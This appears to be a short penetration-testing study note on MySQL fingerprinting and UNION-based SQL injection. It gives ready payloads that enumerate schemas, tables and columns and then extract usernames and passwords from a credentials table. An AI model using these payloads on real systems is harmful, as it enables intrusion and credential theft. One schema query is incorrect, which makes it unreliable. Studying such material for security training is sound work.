🗃️Database Enumeration

MySQL Fingerprinting

We can try to find what database is been used with a couple of commands

SELECT @@version - Returns MySQL version if MySQL, error out if other DMBS

SELECT POW(1,1) - Returns 1 if MySQL, errors with other DBMS

SELECT SLEEP(5)- Delays page response by 5 seconds if MySQL, will not delay with other DBMS

INFORMATION_SCHEMA

Contains information about the DB and the tables present

SCHEMATA

We can find out the available databases on the DBMS using the INFORMATION_SCHEMA in our query, by selecting the SCHEMA_NAME column we can see all the database names present.

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA;

Working UNION SQL Injection Example

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Let's say we found two other than the default DB's; dev and customers.

We can then find out which database the web app is currently running

cn' UNION select 1,database(),2,3-- -

TABLES

We can get a list of all the tables within the database with the below query.

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

COLUMNS

We can find the columns names of a particular table with the below query

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

Data

Once we have all the information we can form our UNION query to data, in this case, username and password in the dev database.

cn' UNION select 1, username, password, 4 from dev.credentials-- -